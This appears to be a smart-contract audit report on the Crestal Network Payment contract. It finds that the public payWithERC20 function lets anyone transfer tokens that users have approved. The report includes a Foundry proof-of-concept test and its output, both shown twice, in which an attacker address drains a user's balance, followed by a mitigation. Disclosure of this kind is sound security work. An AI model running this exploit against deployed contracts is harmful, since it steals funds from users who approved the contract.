Ripe Honey Cyborg

High

# Users could lose funds for any approved token due to Missing Payment Token Validation in `payWithERC20`

### Summary

### [H-01] Users could lose funds for any approved token due to Missing Payment Token Validation in `payWithERC20`



**Description:**
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25

The `payWithERC20` function in `Payment.sol` is public and does not check if `erc20TokenAddress` is enabled in `paymentAddressEnableMp`. While internal callers impose this check, the public nature of the function allows direct external calls without such validation.

```javascript
 function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
```
Visibility: The function is explicitly declared as public, meaning anyone can call it directly.
In `BlueprintCore::payWithERC20` is called by functions in BlueprintCore like `createAgent`, `updateWorkerDeploymentConfigCommon`, and `userTopUp`.
These internal calls ensure `tokenAddress` is enabled, but `payWithERC20` itself remains callable independently.
ERC20 tokens require users to approve the contract (e.g., BlueprintV5’s proxy address) to spend tokens on their behalf via safeTransferFrom. If a user approves the contract for any ERC20 token, payWithERC20 can transfer those tokens without additional checks when called directly.



**Impact:**

- **Funds can be drained**: Users could lose funds for any approved ERC20 token, even if the protocol has disabled the token via `removePaymentAddress`.


**Proof of Concept:**

***Conditions:***
- User approves the contract to spend any ERC20 token.
- The attack works with any ERC20 token the contract is approved for, not just those in `paymentAddressEnableMp`.



The following PoC test demonstrates the vulnerability. Add this test to the test suite in BluePrintV5.t.sol:

```javascript
function test_canDrainFunds() public {
        // Define attacker address
        address attacker = address(0xDEAD);

        // Mint tokens to the test account (simulating a user)
        uint256 userFunds = 100 * 10 ** 18;
        mockToken.mint(address(this), userFunds);

        // Log initial balances
        console.log("Initial user balance:", mockToken.balanceOf(address(this)));
        console.log("Initial attacker balance:", mockToken.balanceOf(attacker));

        // Verify initial balances
        assertEq(mockToken.balanceOf(address(this)), userFunds, "User should have initial funds");
        assertEq(mockToken.balanceOf(attacker), 0, "Attacker should start with zero balance");

        // User approves the Blueprint contract to spend their tokens (common user action)
        mockToken.approve(address(blueprint), userFunds);

        // Log allowance
        uint256 allowance = mockToken.allowance(address(this), address(blueprint));
        console.log("Allowance granted to Blueprint:", allowance);

        // Verify approval
        assertEq(allowance, userFunds, "Blueprint should have full allowance");

        // Attacker calls payWithERC20 directly to drain funds
        vm.prank(attacker); // Simulate attacker calling the function
        blueprint.payWithERC20(address(mockToken), userFunds, address(this), attacker);

        // Log balances after the exploit
        console.log("User balance after exploit:", mockToken.balanceOf(address(this)));
        console.log("Attacker balance after exploit:", mockToken.balanceOf(attacker));

        // Verify funds have been drained
        assertEq(mockToken.balanceOf(address(this)), 0, "User funds should be drained");
        assertEq(mockToken.balanceOf(attacker), userFunds, "Attacker should have received the funds");
    }
```
****Description:****
    - Defines an attacker address (0xDEAD).
    - Mints 100 tokens to the contract (simulating a user).

    -Initial state:
        - User has 100 tokens.
        - Attacker has 0 tokens.
    -User approves the contract to spend their tokens.
        - Approves the BlueprintV5 contract to spend 100 tokens from the test contract’s address.
        - Verifies the allowance is set correctly.
    -Attacker calls payWithERC20 directly to drain funds.

***Output:***
    
```bash
    Ran 1 test for test/BlueprintV5.t.sol:BlueprintTest
[PASS] test_canDrainFunds() (gas: 102381)
Logs:
  Initial user balance: 100000000000000000000
  Initial attacker balance: 0
  Allowance granted to Blueprint: 100000000000000000000
  User balance after exploit: 0
  Attacker balance after exploit: 100000000000000000000

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.63ms (9.71ms CPU time)

Ran 1 test suite in 40.10ms (14.63ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
```











**Recommended Mitigation:**

Add an access control modifier (e.g., onlyBlueprintCore):

```javascript
modifier onlyBlueprintCore() {
    require(msg.sender == address(this), "Only callable by BlueprintCore");
    _;
}
function payWithERC20(...) public onlyBlueprintCore { ... }
```
This ensures only BlueprintCore can call it, leveraging its existing validation.






### Root Cause

The `payWithERC20` function in `Payment.sol` is public and does not check if `erc20TokenAddress` is enabled in `paymentAddressEnableMp`. While internal callers impose this check, the public nature of the function allows direct external calls without such validation.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25

### Internal Pre-conditions

ERC20 tokens require users to approve the contract (e.g., BlueprintV5’s proxy address) to spend tokens on their behalf via safeTransferFrom. If a user approves the contract for any ERC20 token, payWithERC20 can transfer those tokens without additional checks when called directly.

### External Pre-conditions

N/a

### Attack Path

- User approves the contract to spend any ERC20 token.
If a user approves the contract for any ERC20 token, attacker calls `payWithERC20` and can transfer those tokens without additional checks when called directly.



### Impact

**Funds can be drained**: Users could lose funds for any approved ERC20 token, even if the protocol has disabled the token via `removePaymentAddress`.

### PoC

**Proof of Concept:**

***Conditions:***
- User approves the contract to spend any ERC20 token.
- The attack works with any ERC20 token the contract is approved for, not just those in `paymentAddressEnableMp`.



The following PoC test demonstrates the vulnerability. Add this test to the test suite in BluePrintV5.t.sol:

```javascript
function test_canDrainFunds() public {
        // Define attacker address
        address attacker = address(0xDEAD);

        // Mint tokens to the test account (simulating a user)
        uint256 userFunds = 100 * 10 ** 18;
        mockToken.mint(address(this), userFunds);

        // Log initial balances
        console.log("Initial user balance:", mockToken.balanceOf(address(this)));
        console.log("Initial attacker balance:", mockToken.balanceOf(attacker));

        // Verify initial balances
        assertEq(mockToken.balanceOf(address(this)), userFunds, "User should have initial funds");
        assertEq(mockToken.balanceOf(attacker), 0, "Attacker should start with zero balance");

        // User approves the Blueprint contract to spend their tokens (common user action)
        mockToken.approve(address(blueprint), userFunds);

        // Log allowance
        uint256 allowance = mockToken.allowance(address(this), address(blueprint));
        console.log("Allowance granted to Blueprint:", allowance);

        // Verify approval
        assertEq(allowance, userFunds, "Blueprint should have full allowance");

        // Attacker calls payWithERC20 directly to drain funds
        vm.prank(attacker); // Simulate attacker calling the function
        blueprint.payWithERC20(address(mockToken), userFunds, address(this), attacker);

        // Log balances after the exploit
        console.log("User balance after exploit:", mockToken.balanceOf(address(this)));
        console.log("Attacker balance after exploit:", mockToken.balanceOf(attacker));

        // Verify funds have been drained
        assertEq(mockToken.balanceOf(address(this)), 0, "User funds should be drained");
        assertEq(mockToken.balanceOf(attacker), userFunds, "Attacker should have received the funds");
    }
```
****Description:****
    - Defines an attacker address (0xDEAD).
    - Mints 100 tokens to the contract (simulating a user).

    -Initial state:
        - User has 100 tokens.
        - Attacker has 0 tokens.
    -User approves the contract to spend their tokens.
        - Approves the BlueprintV5 contract to spend 100 tokens from the test contract’s address.
        - Verifies the allowance is set correctly.
    -Attacker calls payWithERC20 directly to drain funds.

***Output:***
    
```bash
    Ran 1 test for test/BlueprintV5.t.sol:BlueprintTest
[PASS] test_canDrainFunds() (gas: 102381)
Logs:
  Initial user balance: 100000000000000000000
  Initial attacker balance: 0
  Allowance granted to Blueprint: 100000000000000000000
  User balance after exploit: 0
  Attacker balance after exploit: 100000000000000000000

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.63ms (9.71ms CPU time)

Ran 1 test suite in 40.10ms (14.63ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
```



### Mitigation



**Recommended Mitigation:**

Add an access control modifier (e.g., onlyBlueprintCore):

```javascript
modifier onlyBlueprintCore() {
    require(msg.sender == address(this), "Only callable by BlueprintCore");
    _;
}
function payWithERC20(...) public onlyBlueprintCore { ... }
```
This ensures only BlueprintCore can call it, leveraging its existing validation.
